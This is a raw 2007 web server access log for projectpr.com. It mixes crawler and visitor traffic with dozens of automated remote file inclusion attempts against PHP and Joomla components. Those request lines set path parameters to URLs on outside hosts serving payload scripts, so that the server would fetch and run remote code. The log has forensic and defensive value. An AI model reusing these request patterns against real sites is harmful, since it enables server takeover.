74.52.245.146 - - [11/Sep/2007:17:28:12 -0700] "GET / HTTP/1.0" 200 10036 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" "www.projectpr.com"
212.241.213.244 - - [11/Sep/2007:18:37:49 -0700] "GET //cms/newspublish/home.parserss.php//include.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
212.241.213.244 - - [11/Sep/2007:18:37:57 -0700] "GET //cms/newspublish/home.parserss.php//include.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
212.241.213.244 - - [11/Sep/2007:18:38:06 -0700] "GET //cms/newspublish/home.parserss.php//include.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
68.20.55.106 - - [11/Sep/2007:19:29:03 -0700] "GET //cms/newspublish/home.parserss.php//include.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
87.233.133.178 - - [11/Sep/2007:19:44:23 -0700] "GET /logs/access.log//cms/newspublish/home.parserss.php//include.php?path[docroot]=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 309 "-" "libwww-perl/5.79" "www.projectpr.com"
87.233.133.178 - - [11/Sep/2007:19:44:23 -0700] "GET //cms/newspublish/home.parserss.php//include.php?path[docroot]=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
87.233.133.178 - - [11/Sep/2007:19:44:24 -0700] "GET /logs//cms/newspublish/home.parserss.php//include.php?path[docroot]=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.34.180.168 - - [11/Sep/2007:19:46:12 -0700] "GET //cms/newspublish/home.parserss.php//include.php?path[docroot]=http://lamer.newsit.es/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
88.131.153.91 - - [11/Sep/2007:19:46:49 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.projectpr.com"
88.131.153.91 - - [11/Sep/2007:19:46:49 -0700] "GET /aboutus.html HTTP/1.0" 200 9447 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.projectpr.com"
68.20.55.106 - - [11/Sep/2007:19:50:33 -0700] "GET /logs/access.log//cms/newspublish/home.parserss.php//include.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
68.20.55.106 - - [11/Sep/2007:19:50:33 -0700] "GET /logs//cms/newspublish/home.parserss.php//include.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
62.121.130.40 - - [11/Sep/2007:19:56:08 -0700] "GET /logs/access.log//cms/newspublish/home.parserss.php//include.php?path[docroot]=http://trezze.ath.cx/Scan_BoT/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
62.121.130.40 - - [11/Sep/2007:19:56:08 -0700] "GET //cms/newspublish/home.parserss.php//include.php?path[docroot]=http://trezze.ath.cx/Scan_BoT/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
62.121.130.40 - - [11/Sep/2007:19:56:09 -0700] "GET /logs//cms/newspublish/home.parserss.php//include.php?path[docroot]=http://trezze.ath.cx/Scan_BoT/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
218.45.162.227 - - [11/Sep/2007:20:16:03 -0700] "GET /logs/access.log//cms/newspublish/home.parserss.php//include.php?path[docroot]=http://brant.3x.ro/test.txt? HTTP/1.1" 404 309 "-" "libwww-perl/5.65" "www.projectpr.com"
218.45.162.227 - - [11/Sep/2007:20:16:03 -0700] "GET //cms/newspublish/home.parserss.php//include.php?path[docroot]=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
218.45.162.227 - - [11/Sep/2007:20:16:03 -0700] "GET /logs//cms/newspublish/home.parserss.php//include.php?path[docroot]=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
193.254.202.15 - - [11/Sep/2007:20:16:55 -0700] "GET //cms/newspublish/home.parserss.php//include.php?path[docroot]=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
74.53.174.242 - - [11/Sep/2007:20:30:07 -0700] "GET /logs/access.log//login.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 272 "-" "libwww-perl/5.79" "www.projectpr.com"
74.53.174.242 - - [11/Sep/2007:20:30:07 -0700] "GET //login.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
74.53.174.242 - - [11/Sep/2007:20:30:07 -0700] "GET /logs//login.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
193.254.202.15 - - [11/Sep/2007:20:44:23 -0700] "GET /logs/access.log//cms/newspublish/home.parserss.php//include.php?path[docroot]=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
193.254.202.15 - - [11/Sep/2007:20:44:23 -0700] "GET /logs//cms/newspublish/home.parserss.php//include.php?path[docroot]=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
212.241.198.249 - - [11/Sep/2007:20:54:37 -0700] "GET /logs/access.log//Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://lecentre.ath.cx/cmdx.txt? HTTP/1.1" 404 317 "-" "libwww-perl/5.79" "www.projectpr.com"
212.241.198.249 - - [11/Sep/2007:20:54:37 -0700] "GET //Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://lecentre.ath.cx/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
212.241.198.249 - - [11/Sep/2007:20:54:38 -0700] "GET /logs//Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://lecentre.ath.cx/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
200.25.236.26 - - [11/Sep/2007:21:10:55 -0700] "GET //cms/newspublish/home.parserss.php//include.php?path[docroot]=http://mytorrentz.org/torrents/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
80.89.5.20 - - [11/Sep/2007:21:22:03 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_facileforms&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 268 "-" "libwww-perl/5.805" "www.projectpr.com"
80.89.5.20 - - [11/Sep/2007:21:27:09 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 268 "-" "libwww-perl/5.805" "www.projectpr.com"
200.25.236.26 - - [11/Sep/2007:21:57:07 -0700] "GET /logs/access.log//cms/newspublish/home.parserss.php//include.php?path[docroot]=http://mytorrentz.org/torrents/id.txt? HTTP/1.1" 404 309 "-" "libwww-perl/5.803" "www.projectpr.com"
200.25.236.26 - - [11/Sep/2007:21:57:08 -0700] "GET /logs//cms/newspublish/home.parserss.php//include.php?path[docroot]=http://mytorrentz.org/torrents/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
66.249.67.53 - - [11/Sep/2007:21:58:17 -0700] "GET /clipart/images/frames/ HTTP/1.1" 200 721 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
80.89.5.20 - - [11/Sep/2007:22:02:09 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 271 "-" "libwww-perl/5.805" "www.projectpr.com"
80.89.5.20 - - [11/Sep/2007:22:02:10 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.89.5.20 - - [11/Sep/2007:22:07:46 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_facileforms&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 271 "-" "libwww-perl/5.805" "www.projectpr.com"
80.89.5.20 - - [11/Sep/2007:22:07:47 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_facileforms&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
212.69.218.144 - - [11/Sep/2007:22:33:24 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://paginas.terra.com.br/lazer/cezinha/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.projectpr.com"
212.69.218.144 - - [11/Sep/2007:22:33:26 -0700] "GET /newspublish/include.php?path[docroot]=http://paginas.terra.com.br/lazer/cezinha/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.projectpr.com"
64.16.212.130 - - [11/Sep/2007:22:57:19 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 307 "-" "libwww-perl/5.805" "www.projectpr.com"
64.16.212.130 - - [11/Sep/2007:23:02:57 -0700] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 323 "-" "libwww-perl/5.805" "www.projectpr.com"
64.16.212.130 - - [11/Sep/2007:23:02:57 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.38.59.34 - - [11/Sep/2007:23:37:34 -0700] "GET /logs//include/write.php?dir=http://paginas.terra.com.br/lazer/cezinha/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [11/Sep/2007:23:37:35 -0700] "GET //include/write.php?dir=http://paginas.terra.com.br/lazer/cezinha/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.216.213.227 - - [11/Sep/2007:23:37:54 -0700] "GET /logs/access.log/index2.php?option=com_joomlaboardhttp://www.sxmlink.org/new/administrator/components/com_installer/language/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
209.216.213.227 - - [11/Sep/2007:23:37:54 -0700] "GET /logs/access.log/index2.php?option=com_joomlaboardhttp://www.sxmlink.org/new/administrator/components/com_installer/language/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
209.216.213.227 - - [11/Sep/2007:23:37:55 -0700] "GET /index2.php?option=com_joomlaboardhttp://www.sxmlink.org/new/administrator/components/com_installer/language/r.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.65" "www.projectpr.com"
209.216.213.227 - - [11/Sep/2007:23:37:55 -0700] "GET /index2.php?option=com_joomlaboardhttp://www.sxmlink.org/new/administrator/components/com_installer/language/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
209.216.213.227 - - [11/Sep/2007:23:37:55 -0700] "GET /logs/index2.php?option=com_joomlaboardhttp://www.sxmlink.org/new/administrator/components/com_installer/language/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
209.216.213.227 - - [11/Sep/2007:23:37:55 -0700] "GET /logs/index2.php?option=com_joomlaboardhttp://www.sxmlink.org/new/administrator/components/com_installer/language/r.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.65" "www.projectpr.com"
64.38.59.34 - - [11/Sep/2007:23:44:22 -0700] "GET /logs//include/write.php?dir=http://www.cartographia.org/administrator/d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [11/Sep/2007:23:44:22 -0700] "GET //include/write.php?dir=http://www.cartographia.org/administrator/d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.255.117.221 - - [11/Sep/2007:23:45:37 -0700] "GET /logs/access.log HTTP/1.1" 200 11775 "" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4" "projectpr.com"
88.131.153.91 - - [12/Sep/2007:00:43:53 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.projectpr.com"
88.131.153.91 - - [12/Sep/2007:00:43:54 -0700] "GET /services.html HTTP/1.0" 200 9306 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.projectpr.com"
139.222.127.73 - - [12/Sep/2007:01:53:00 -0700] "GET / HTTP/1.0" 200 10036 "http://www.google.co.uk/search?hl=en&q=Project+PR&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; University of East Anglia; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.projectpr.com"
139.222.127.73 - - [12/Sep/2007:01:53:01 -0700] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.0" 200 47456 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; University of East Anglia; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.projectpr.com"
139.222.127.73 - - [12/Sep/2007:01:53:01 -0700] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.0" 200 709 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; University of East Anglia; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.projectpr.com"
139.222.127.73 - - [12/Sep/2007:01:53:01 -0700] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.0" 200 33964 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; University of East Anglia; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.projectpr.com"
139.222.127.73 - - [12/Sep/2007:01:53:02 -0700] "GET /sitebuilder/images/navbar-0-active-65203.png HTTP/1.0" 200 250 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; University of East Anglia; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.projectpr.com"
139.222.127.73 - - [12/Sep/2007:01:53:02 -0700] "GET /sitebuilder/images/navbar-1-inactive-65328.png HTTP/1.0" 200 273 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; University of East Anglia; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.projectpr.com"
139.222.127.73 - - [12/Sep/2007:01:53:02 -0700] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.0" 200 303 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; University of East Anglia; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.projectpr.com"
139.222.127.73 - - [12/Sep/2007:01:53:03 -0700] "GET /sitebuilder/images/navbar-3-inactive-65640.png HTTP/1.0" 200 298 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; University of East Anglia; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.projectpr.com"
139.222.127.73 - - [12/Sep/2007:01:53:03 -0700] "GET /images/promo_mail.gif HTTP/1.0" 200 1469 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; University of East Anglia; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.projectpr.com"
66.249.67.53 - - [12/Sep/2007:02:08:07 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
66.249.67.53 - - [12/Sep/2007:02:08:07 -0700] "GET /clipart/buttons/blank/?M=A HTTP/1.1" 200 735 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
74.6.19.118 - - [12/Sep/2007:02:11:19 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
74.6.25.205 - - [12/Sep/2007:02:11:20 -0700] "GET /sitebuilder/ HTTP/1.0" 200 655 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
72.232.242.146 - - [12/Sep/2007:02:16:22 -0700] "GET / HTTP/1.0" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" "www.projectpr.com"
202.20.191.101 - - [12/Sep/2007:02:41:55 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "sait/Nutch-0.9 (SAIT TEST AGENT; http://www.sait.samsung.co.kr)" "www.projectpr.com"
202.20.191.101 - - [12/Sep/2007:02:41:55 -0700] "GET / HTTP/1.0" 200 10036 "-" "sait/Nutch-0.9 (SAIT TEST AGENT; http://www.sait.samsung.co.kr)" "www.projectpr.com"
81.19.67.14 - - [12/Sep/2007:02:51:26 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "StackRambler/2.0 (MSIE incompatible)" "www.projectpr.com"
74.6.23.124 - - [12/Sep/2007:02:52:22 -0700] "GET /sitebuilder/images/?D=D HTTP/1.0" 200 2741 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
74.6.23.168 - - [12/Sep/2007:02:57:32 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
74.6.19.77 - - [12/Sep/2007:03:15:49 -0700] "GET /logs/access_060412.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
206.123.101.21 - - [12/Sep/2007:03:38:59 -0700] "GET /include.php?path[docroot]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
80.120.19.95 - - [12/Sep/2007:04:07:24 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.805" "www.projectpr.com"
213.218.133.171 - - [12/Sep/2007:04:46:15 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.myadultsshop.com/media/id.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.803" "www.projectpr.com"
81.153.175.91 - - [12/Sep/2007:04:50:55 -0700] "GET / HTTP/1.1" 200 10036 "http://www.google.co.uk/search?hl=en&q=project+pr&meta=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
81.153.175.91 - - [12/Sep/2007:04:50:56 -0700] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.1" 200 47456 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
81.153.175.91 - - [12/Sep/2007:04:50:56 -0700] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.1" 200 709 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
81.153.175.91 - - [12/Sep/2007:04:50:57 -0700] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.1" 200 33964 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
81.153.175.91 - - [12/Sep/2007:04:50:59 -0700] "GET /sitebuilder/images/navbar-0-active-65203.png HTTP/1.1" 200 250 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
81.153.175.91 - - [12/Sep/2007:04:51:00 -0700] "GET /sitebuilder/images/navbar-1-inactive-65328.png HTTP/1.1" 200 273 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
81.153.175.91 - - [12/Sep/2007:04:51:01 -0700] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.1" 200 303 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
81.153.175.91 - - [12/Sep/2007:04:51:01 -0700] "GET /images/promo_mail.gif HTTP/1.1" 200 1469 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
81.153.175.91 - - [12/Sep/2007:04:51:02 -0700] "GET /sitebuilder/images/navbar-3-inactive-65640.png HTTP/1.1" 200 298 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
81.153.175.91 - - [12/Sep/2007:04:51:03 -0700] "GET /favicon.ico HTTP/1.1" 404 257 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
81.153.175.91 - - [12/Sep/2007:04:51:07 -0700] "GET /contactus.html HTTP/1.1" 200 12521 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
81.153.175.91 - - [12/Sep/2007:04:51:09 -0700] "GET /sitebuilder/images/navbar-2-active-65531.png HTTP/1.1" 200 303 "http://www.projectpr.com/contactus.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
81.153.175.91 - - [12/Sep/2007:04:51:09 -0700] "GET /sitebuilder/images/navbar-0-inactive-65062.png HTTP/1.1" 200 250 "http://www.projectpr.com/contactus.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:05:01:31 -0700] "GET /logs/components/com_hashcash/server.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.59.34 - - [12/Sep/2007:05:01:31 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
213.218.133.171 - - [12/Sep/2007:05:04:25 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.myadultsshop.com/media/id.txt?? HTTP/1.1" 404 309 "-" "libwww-perl/5.803" "www.projectpr.com"
213.218.133.171 - - [12/Sep/2007:05:04:25 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.myadultsshop.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
207.46.98.36 - - [12/Sep/2007:05:20:54 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.projectpr.com"
207.46.98.36 - - [12/Sep/2007:05:20:54 -0700] "GET /contactus.html HTTP/1.0" 200 12521 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.projectpr.com"
208.36.144.9 - - [12/Sep/2007:05:52:25 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "projectpr.com"
75.55.89.174 - - [12/Sep/2007:05:57:01 -0700] "GET / HTTP/1.1" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)" "www.projectpr.com"
75.55.89.174 - - [12/Sep/2007:05:57:01 -0700] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.1" 200 47456 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)" "www.projectpr.com"
75.55.89.174 - - [12/Sep/2007:05:57:01 -0700] "GET / HTTP/1.1" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)" "www.projectpr.com"
75.55.89.174 - - [12/Sep/2007:05:57:02 -0700] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.1" 200 709 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)" "www.projectpr.com"
75.55.89.174 - - [12/Sep/2007:05:57:02 -0700] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.1" 200 33964 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)" "www.projectpr.com"
75.55.89.174 - - [12/Sep/2007:05:57:02 -0700] "GET /sitebuilder/images/navbar-0-active-65203.png HTTP/1.1" 200 250 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)" "www.projectpr.com"
75.55.89.174 - - [12/Sep/2007:05:57:03 -0700] "GET /sitebuilder/images/navbar-1-inactive-65328.png HTTP/1.1" 200 273 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)" "www.projectpr.com"
75.55.89.174 - - [12/Sep/2007:05:57:03 -0700] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.1" 200 303 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)" "www.projectpr.com"
75.55.89.174 - - [12/Sep/2007:05:57:03 -0700] "GET /sitebuilder/images/navbar-3-inactive-65640.png HTTP/1.1" 200 298 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)" "www.projectpr.com"
75.55.89.174 - - [12/Sep/2007:05:57:03 -0700] "GET /images/promo_mail.gif HTTP/1.1" 200 1469 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)" "www.projectpr.com"
75.55.89.174 - - [12/Sep/2007:05:57:03 -0700] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.1" 200 47456 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)" "www.projectpr.com"
75.55.89.174 - - [12/Sep/2007:05:57:03 -0700] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.1" 200 709 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)" "www.projectpr.com"
75.55.89.174 - - [12/Sep/2007:05:57:04 -0700] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.1" 200 33964 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)" "www.projectpr.com"
